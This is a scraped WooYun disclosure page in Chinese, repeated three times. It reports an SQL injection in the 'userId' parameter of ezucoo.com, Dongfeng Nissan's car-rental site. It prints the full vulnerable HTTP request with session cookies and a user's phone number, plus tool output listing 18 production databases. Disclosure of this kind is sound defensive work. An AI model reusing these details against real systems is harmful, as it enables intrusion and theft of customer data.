东风日产旗下易租车SQL注入(涉及18库) | wooyun-2015-0131796| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131796

漏洞标题：东风日产旗下易租车SQL注入(涉及18库)

漏洞作者：路人甲

提交时间：2015-08-05 12:28

修复时间：2015-09-19 14:36

公开时间：2015-09-19 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-08-05：细节已通知厂商并且等待厂商处理中
2015-08-05：厂商已经确认，细节仅向厂商公开
2015-08-15：细节向核心白帽子及相关领域专家公开
2015-08-25：细节向普通白帽子公开
2015-09-04：细节向实习白帽子公开
2015-09-19：细节向公众公开

简要描述：

是不是也要给2rank啊

详细说明：

注入点

X-Requested-With: XMLHttpRequest
Referer: http://www.ezucoo.com/myezccenter/PersonalInformationShow/PersonalInformationUpdate
Content-Length: 522
Cookie: SC_ANALYTICS_GLOBAL_COOKIE=50a7f11efa0c490cbebcafaef8e49d5c; _smt_uid=55c097ce.6771fdc; looyu_id=f0d025f1a18a229d6b2ae423db8844b43d_50895%3A2; ASP.NET_SessionId=el0l0yfihvxjx540smj11m0y; SC_ANALYTICS_SESSION_COOKIE=29880DDE9A4243E8BC6FE5E484D5230E|1|el0l0yfihvxjx540smj11m0y; CityNoByIP=20004; CityNameByIP=%e9%87%8d%e5%ba%86%e5%b8%82; CityCodeByWeatherByIP=%e9%87%8d%e5%ba%86; CityNo=20004; CityName=%e9%87%8d%e5%ba%86%e5%b8%82; CityCodeByWeather=%e9%87%8d%e5%ba%86; ARRAffinity=be7d041a2b2e40f21bc21cc1815e26d880f6cf2bbb0becab844d3af94f2c6321; npasslogin=0; looyu_50895=v%3Acea5bab21b5574bbde081b8a24816eb1ad%2Cref%3A%2Cr%3A%2Cmon%3Ahttp%3A//m153.looyu.com/monitor
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
method=SaveEditPersonalInfo&userId=168165&username=13750000001&phone=13750000001&birthday=2015-07-31&education=4&qq=1651651&msn=&tel=&address=fasdfsdf&zipcode=&driverdate=&driverindate=&driverlisener=&provinceno=6&cityno=&email=&countyno=&carmodel=&carnum=&unitname=&unittelarea=&unittel=&faxarea=&fax=&position=ghs&seniority=&unitaddress=%E9%A3%9E%E5%BE%97%E6%9B%B4%E5%BF%AB%E4%BA%86%E5%9D%9A%E5%AE%9E%E7%9A%84%E6%B3%95%E8%A7%84&unitzipcode=&isnaddress=422003&naddress=%E4%B8%8A%E5%AE%98%E5%A9%89%E5%84%BF&mailingzipcode=

userid参数
注入过程

漏洞证明：

数据库
available databases [18]:
[*] DBA_Audit
[*] DFL2Extend
[*] DFL_EZC
[*] DFLACTIVITY
[*] DFLACTIVITY_NEW
[*] DFLBackground
[*] DFLLoginLog
[*] DFLSitecore_Core
[*] DFLSitecore_Extend
[*] DFLSitecore_Web
[*] DFLWebService
[*] master
[*] model
[*] msdb
[*] Npass
[*] Sitecore_analytics
[*] SMS
[*] tempdb

修复方案：

。。。。。。。。。。。。。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-08-05 14:34

厂商回复：

感谢提醒，我们会尽快修复漏洞。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131796

漏洞标题：东风日产旗下易租车SQL注入(涉及18库)

相关厂商：东风日产乘用车公司

漏洞作者：路人甲

提交时间：2015-08-05 12:28

修复时间：2015-09-19 14:36

公开时间：2015-09-19 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0131796

漏洞标题：东风日产旗下易租车SQL注入(涉及18库)

相关厂商：东风日产乘用车公司

漏洞作者： 路人甲

提交时间：2015-08-05 12:28

修复时间：2015-09-19 14:36

公开时间：2015-09-19 14:36

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0131796"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云